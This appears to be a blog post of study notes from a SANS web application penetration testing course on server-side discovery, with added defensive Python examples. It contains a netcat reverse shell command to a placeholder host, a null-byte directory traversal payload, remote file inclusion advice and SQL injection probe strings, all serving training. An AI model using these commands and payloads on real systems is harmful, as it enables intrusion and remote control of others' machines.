Inaccurate Design

SANS GWAPT Day 2: Server Side Discovery

Tuesday, 14 May 2013

Discovery Phase

  • Use this phase to find vulnerabilities, and confirm that they’re not false positives. Don’t use them for further exploitation (yet).

  • Always spider your target first, then scan for vulnerabilities. This will ensure that you’re scanning the entire target and you don’t miss entire sections of the application.

  • Don’t run all the plugins of the scanner.

    1. It can take a very, very long time
    2. It will come back with a whole bunch of vulnerabilities that you either don’t care about or won’t bother reporting anyway
  • When you do your scans, ensure you exclude any logout links (if you’re doing an authenticated scan). This will ensure the scanner doesn’t log itself out halfway through a scan

  • Skipfish will scan the entire domain by default, regardless of the URL given (use the -I option to override)

    • Skipfish is very fast, but watch this does not cause issues on your target site (ie. crashing it under the load, or triggering IDS/IPS systems)
    • Skipfish can perform adaptive bruteforcing - that is, changing its attack behaviour based on what it finds.
    • Can target multiple technologies - ie PHP, ASP, etc
  • Can also use w3af

Fuzzing

  • Throwing random strings at the application to see how it reacts, through various inputs

    • Inputs can include cookies, headers, GET and POST parameters.
    • Fuzz combinations of input lengths, characters, types of data (strings, ints, dates)
    • Can reveal buffer overflow, command injection, XSS, and SQL Injection vulnerabilities
  • Context is important! No point in fuzzing an application with Windows vulnerabilities if you know the target runs Linux

  • FuzzDB is a database of possible (verified) strings to use for fuzzing.

    • can be used with the Intruder module of Burp (and other tools) for automated fuzzing
    • has an ‘errors.txt’ file that contains common error messages, which can be used by automated tools such as Burp
  • You can use the ‘Comparer’ function in Burp to compare results of responses/requests when fuzzing

    • can also compare manually, or using commands like diff

Username Harvesting

  • Can use signup forms, login forms and password reset forms to figure out which usernames are in use

  • Bruteforcing takes a long time; you can automatically fuzz with the right tools

    • check for differences in pages, URLs or error messages and configure your tool to look for these.
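
Added example (not from the original notes): the response comparison described under Fuzzing and Username Harvesting, written as a check to run over responses recorded from your own application. The response records, the csrf field name and the error signatures are constructed for illustration; the signatures stand in for entries from a list such as errors.txt.

```python
import re

# Constructed stand-ins for entries in an error list such as errors.txt.
ERROR_SIGNATURES = ["error in your SQL syntax", "Traceback (most recent call last)"]
# Hypothetical per-request token field that changes on every response.
VOLATILE = re.compile(r'(name="csrf" value=")[^"]*')


def normalise(body, sent):
    """Blank out values that legitimately differ between two requests."""
    body = VOLATILE.sub(r"\1", body)
    return body.replace(sent, "<input>") if sent else body


def signals(base, cand, slow_ms=200):
    """Name every observable difference between two recorded responses."""
    found = []
    if base["status"] != cand["status"]:
        found.append("status")
    if base["location"] != cand["location"]:
        found.append("redirect")
    if normalise(base["body"], base["sent"]) != normalise(cand["body"], cand["sent"]):
        found.append("body")
    if abs(base["ms"] - cand["ms"]) > slow_ms:
        found.append("timing")
    for sig in ERROR_SIGNATURES:
        if sig in cand["body"] and sig not in base["body"]:
            found.append("error:" + sig)
    return found


def resp(sent, status, ms, body, location=None):
    return {"sent": sent, "status": status, "ms": ms, "body": body, "location": location}


TOKEN = '<input name="csrf" value="%s">'
# Constructed password-reset responses: a leaky form, then a uniform form.
LEAKY_KNOWN = resp("alice", 200, 310, "Reset link sent to alice." + TOKEN % "a1f3")
LEAKY_UNKNOWN = resp("zzqx", 200, 15, "No account named zzqx." + TOKEN % "9c0e")
UNIFORM_KNOWN = resp("alice", 200, 300, "If alice is registered, a link was sent." + TOKEN % "77b2")
UNIFORM_UNKNOWN = resp("zzqx", 200, 305, "If zzqx is registered, a link was sent." + TOKEN % "c4d1")
# Constructed item page and the same page after a single-quote input.
ITEM_OK = resp("9", 200, 20, "<h1>Item 9</h1>" + TOKEN % "0e11")
ITEM_FUZZED = resp("9'", 500, 25, "You have an error in your SQL syntax near '9''")

if __name__ == "__main__":
    print(signals(LEAKY_KNOWN, LEAKY_UNKNOWN))      # enumeration possible
    print(signals(UNIFORM_KNOWN, UNIFORM_UNKNOWN))  # nothing to distinguish
    print(signals(ITEM_OK, ITEM_FUZZED))            # fuzz input changed behaviour
```

Without the normalise step the per-request token and the echoed input would make every pair of responses look different, which is why the comparison has to be told what to ignore.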

Netcat shells

  • Use netcat to get shell access on the target machine

    • on receiver: nc -l -p 3000
    • on target: nc x.x.x.x 3000 -e /bin/bash
  • Execute any way you can

    • directly through command injection
    • editing a file that gets executed
  • Start a proper bash shell once you have nc access, with errors redirected to stdout - /bin/bash -i 2>&1

Directory Traversal/Local File Includes/Remote File Includes

  • Can add %00.xxx (for example) to get around extension checking

    • If the app checks last three chars of filename, this will trick it
    • %00 is a null byte, commonly used in C/C++ to indicate the end of the file. When the file gets read, the app won’t read past the null byte
    • eg: index.htm?include=../../../boot.ini%00.htm
  • Can also try and include files from remote (attacker controlled) server to get them to execute on the target machines.

    • good way to start an nc shell
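
Added example (not from the original notes): a suffix-only extension check beside a hardened one, run on the `%00.htm` value above. BASE_DIR and the function names are hypothetical, and c_string_view only simulates a runtime that hands the name to a C string API; current Python refuses file names containing a NUL byte on its own.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/pages"                  # hypothetical include directory
INCLUDE_ROOT = os.path.realpath(BASE_DIR)    # resolved once, symlinks included
ALLOWED_EXT = ".htm"


def c_string_view(name):
    """Simulate a C string API: it stops reading at the first NUL byte."""
    return name.split("\x00", 1)[0]


def suffix_only_check(raw_param):
    """Weak 'before' check: validates the suffix, opens the truncated name."""
    name = unquote(raw_param)
    if not name.endswith(ALLOWED_EXT):
        raise ValueError("extension not allowed")
    return os.path.normpath(os.path.join(BASE_DIR, c_string_view(name)))


def hardened_check(raw_param):
    """Reject NUL bytes, then require the resolved path to stay in the root."""
    name = unquote(raw_param)
    if "\x00" in name:
        raise ValueError("NUL byte in file name")
    if not name.endswith(ALLOWED_EXT):
        raise ValueError("extension not allowed")
    resolved = os.path.realpath(os.path.join(INCLUDE_ROOT, name))
    if os.path.commonpath([resolved, INCLUDE_ROOT]) != INCLUDE_ROOT:
        raise ValueError("path escapes the include directory")
    return resolved


def is_rejected(check, raw_param):
    try:
        check(raw_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    sample = "../../../boot.ini%00.htm"        # value from the notes above
    print(suffix_only_check(sample))           # path the weak check lets through
    print(is_rejected(hardened_check, sample))
```

The containment test matters as much as the NUL test: a name with no NUL byte and a valid extension can still climb out of the directory with `../`.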

SQL Injection

  • Three ways an application can quote a vulnerable SQL query

    • no quotes
    • single quote
    • double quote
  • You can work out which method of quoting the target app is using by trying

    • one single quote (breaks ‘no quoting’ and ‘single quoting’ methods)
    • one double quote (breaks ‘no quoting’ and ‘double quoting’ methods)
    • try multiple quotes (adding one at a time) to build up a view of how the query is constructed
  • Remember to check the HTML source, as often the output will not be displayed but end up in awkward spots in the code

    • Use Burp Comparer to check outputs when automating
  • TamperData and SQLInjectMe are Firefox extensions that can be used to fuzz fields in your target application

    • might need in-browser editing if the web app is pinning certificates, as intercepting proxies will screw around with the certificates being presented
  • Be wary of any client side validation when using browser extensions

Blind SQL Injection

  • More difficult to find and exploit, as by definition they don’t show the output on the page

    • Often the results will be shown in the form of no data returned, eg. an unsuccessful search in the application
  • A few methods for finding blind SQL injections

1. Use Yes/No questions to find

    Shows item:   index.php?itemid=9
    No data:      index.php?itemid=;
    Shows item:   index.php?itemid=9' and 1=1; --
    No data:      index.php?itemid=9' and 1=0; --

  • Can use tricks such as the following to close all pairs of brackets

    where id='1' and 'a'='a'

  • Can bruteforce characters out of databases, by only getting the first character, and comparing to ‘a’, ‘b’, ‘c’, etc.

    • evaluate the result to a comparison character to turn it into a true/false query
    • can take a very long time, use automated tools

2. Use timing attacks

  • SQL commands such as benchmark() and waitfor() will cause a noticeable delay

  • Tools like SQLMap and Absinthe are good here
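
Added example (not from the original notes): why the quote and yes/no probes in the two SQL injection sections change a page's behaviour, and why a bound parameter removes the signal. It uses an in-memory SQLite table; the table, its contents and the function names are constructed, and the probe strings are the ones listed above.

```python
import sqlite3


def make_db():
    """In-memory table standing in for the application's data (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (itemid TEXT, name TEXT)")
    db.execute("INSERT INTO items VALUES ('9', 'widget')")
    return db


def lookup_vulnerable(db, itemid):
    """'Before' form: the parameter is pasted inside single quotes."""
    sql = "SELECT name FROM items WHERE itemid = '" + itemid + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, itemid):
    """Hardened form: the value is bound and never parsed as SQL."""
    sql = "SELECT name FROM items WHERE itemid = ?"
    return db.execute(sql, (itemid,)).fetchall()


def observe(lookup, db, itemid):
    """Reduce a response to what a tester sees: item, no data, or an error."""
    try:
        return "item" if lookup(db, itemid) else "no data"
    except sqlite3.Error:
        return "error"


# Probe values taken from the notes above.
PROBES = ["9", "9'", "9' and 1=1; --", "9' and 1=0; --"]


def behaviour(lookup):
    """Map each probe to the observable outcome for one lookup function."""
    db = make_db()
    return {probe: observe(lookup, db, probe) for probe in PROBES}


if __name__ == "__main__":
    for fn in (lookup_vulnerable, lookup_parameterized):
        print(fn.__name__, behaviour(fn))
```

With the concatenated query the true and false conditions give different pages, which is the yes/no signal; with the bound parameter every probe is just an item id that does not exist.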

Cross Site Scripting

  • XSS Me is a browser extension, similar to SQLInjectMe, that can be used for ‘one click’ XSS testing.